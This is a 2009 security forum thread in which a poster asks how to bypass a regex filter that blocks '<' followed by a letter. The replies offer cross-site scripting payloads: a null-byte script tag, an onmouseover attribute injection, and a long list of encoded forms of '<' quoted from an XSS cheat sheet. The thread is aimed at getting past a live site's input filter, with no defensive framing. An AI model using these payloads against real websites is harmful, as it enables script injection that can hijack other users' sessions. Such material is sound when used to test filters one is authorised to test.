Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Filter bypass question
Posted by: yogurtearl
Date: January 29, 2009 06:11PM

So I ran into a filter that filters open angle followed by a letter, i.e. regexp ".*<[a-zA-Z].*", but doesn't encode anything.

The output is in a <span>.

Can anyone think of a filter bypass? It seems like there has to be a bypass for such a simple filter.

Options: ReplyQuote
Re: Filter bypass question
Posted by: backbone
Date: January 29, 2009 07:56PM

<%00script>alert(1)</script>

---
blog [-] microblog

Options: ReplyQuote
Re: Filter bypass question
Posted by: yogurtearl
Date: February 02, 2009 03:24PM

The filter also caught that. It looks they are also filtering < followed by a nonprintable or /. Things allowed after a <:

space
tab
newline
1-9
@#$%^&*()_-+=~`"':;?>.<,

Options: ReplyQuote
Re: Filter bypass question
Posted by: lightos
Date: February 02, 2009 04:05PM

If it's a XSS you want to achieve, " onmouseover="alert(0); should work
If you're just curious about bypassing the filter, I would try different encodings/character combinations.
From ha.ckers XSS cheat sheet:
<
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C

Like it says, "Most of these won't render out of the box, but many of them can get rendered in certain circumstances", so it's worth a try.

Options: ReplyQuote


Sorry, only registered users may post in this forum.